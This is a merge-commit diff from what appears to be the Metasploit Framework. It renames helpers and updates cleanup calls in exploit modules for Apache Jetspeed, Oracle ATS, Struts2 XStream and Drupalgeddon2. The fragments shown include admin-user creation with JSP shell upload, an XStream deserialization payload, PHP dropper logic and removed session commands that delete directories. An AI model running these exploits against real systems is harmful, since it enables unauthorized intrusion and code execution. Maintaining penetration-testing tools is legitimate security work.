Land #11483, update various modules to reflect current best practices

Merge remote-tracking branch 'upstream/pr/11483' into upstream-master

modules/exploits/multi/http/apache_jetspeed_file_upload.rb

@@ -62,10 +62,8 @@ def print_warning(msg='')
   def exploit
     print_status("Creating admin user: #{username}:#{password}")
     create_admin_user
-    # This was originally a typo... but we're having so much fun!
-    print_status('Kenny Loggins in')
-    kenny_loggins
-    print_warning('You have entered the Danger Zone')
+    print_status('Logging in as newly created admin')
+    jetspeed_login
     print_status("Uploading payload ZIP: #{zip_filename}")
     upload_payload_zip
     print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
@@ -102,7 +100,7 @@ def create_admin_user
     )
   end
 
-  def kenny_loggins
+  def jetspeed_login
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => '/jetspeed/login/redirector'
@@ -154,11 +152,11 @@ def upload_payload_zip
 
     case target['Platform']
     when 'linux'
-      register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
-      register_files_for_cleanup("../temp/#{username}/#{zip_filename}")
+      register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
+      register_dir_for_cleanup("../temp/#{username}")
     when 'win'
-      register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
-      register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}")
+      register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
+      register_dir_for_cleanup("..\\temp\\#{username}")
     end
 
     send_request_cgi(
@@ -189,19 +187,6 @@ def delete_user
     )
   end
 
-  # XXX: This is a hack because FileDropper doesn't delete directories
-  def on_new_session(session)
-    super
-    case target['Platform']
-    when 'linux'
-      print_status("Deleting user temp directory: ../temp/#{username}")
-      session.shell_command_token("rm -rf ../temp/#{username}")
-    when 'win'
-      print_status("Deleting user temp directory: ..\\temp\\#{username}")
-      session.shell_command_token("rd /s /q ..\\temp\\#{username}")
-    end
-  end
-
   #
   # Utility methods
   #

modules/exploits/multi/http/oracle_ats_file_upload.rb

@@ -77,7 +77,7 @@ def upload_jsp_shell
     mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
     mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')
 
-    register_files_for_cleanup(jsp_path)
+    register_file_for_cleanup(jsp_path)
 
     send_request_cgi(
       'method' => 'POST',

modules/exploits/multi/http/struts2_rest_xstream.rb

@@ -76,7 +76,7 @@ def initialize(info = {})
   end
 
   def check
-    return CheckCode::Appears if execute_command(random_crap)
+    return CheckCode::Appears if execute_command(rand_str)
 
     CheckCode::Safe
   end
@@ -151,9 +151,9 @@ def xstream_payload(cmd)
                       <name>start</name>
                       <parameter-types/>
                     </method>
-                    <name>#{random_crap}</name>
+                    <name>#{rand_str}</name>
                   </filter>
-                  <next class="string">#{random_crap}</next>
+                  <next class="string">#{rand_str}</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
@@ -189,7 +189,7 @@ def error_string
     'java.lang.String cannot be cast to java.security.Provider$Service'
   end
 
-  def random_crap
+  def rand_str
     Rex::Text.rand_text_alphanumeric(8..42)
   end
 

modules/exploits/unix/webapp/drupal_drupalgeddon2.rb

@@ -122,13 +122,13 @@ def initialize(info = {})
         ]
       ],
       'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
-      'DefaultOptions' => {'WfsDelay' => 2},
+      'DefaultOptions' => {'WfsDelay' => 2}, # Wait between and after attempts
       'Notes'          => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
     ))
 
     register_options([
       OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
-      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+      OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])
     ])
 
     register_advanced_options([
@@ -161,7 +161,7 @@ def check
       print_error('Could not determine Drupal patch level')
     end
 
-    token = random_crap
+    token = rand_str
     res   = execute_command(token, func: 'printf')
 
     if res && res.body.start_with?(token)
@@ -211,7 +211,7 @@ def exploit
 
   def dropper_assert
     php_file = Pathname.new(
-      "#{datastore['WritableDir']}/#{random_crap}.php"
+      "#{datastore['WritableDir']}/#{rand_str}.php"
     ).cleanpath
 
     # Return the PHP payload or a PHP binary dropper
@@ -242,7 +242,7 @@ def dropper_assert
   end
 
   def dropper_exec
-    php_file = "#{random_crap}.php"
+    php_file = "#{rand_str}.php"
     tmp_file = Pathname.new(
       "#{datastore['WritableDir']}/#{php_file}"
     ).cleanpath
@@ -380,7 +380,7 @@ def exploit_drupal8(func, code)
     )
   end
 
-  def random_crap
+  def rand_str
     Rex::Text.rand_text_alphanumeric(8..42)
   end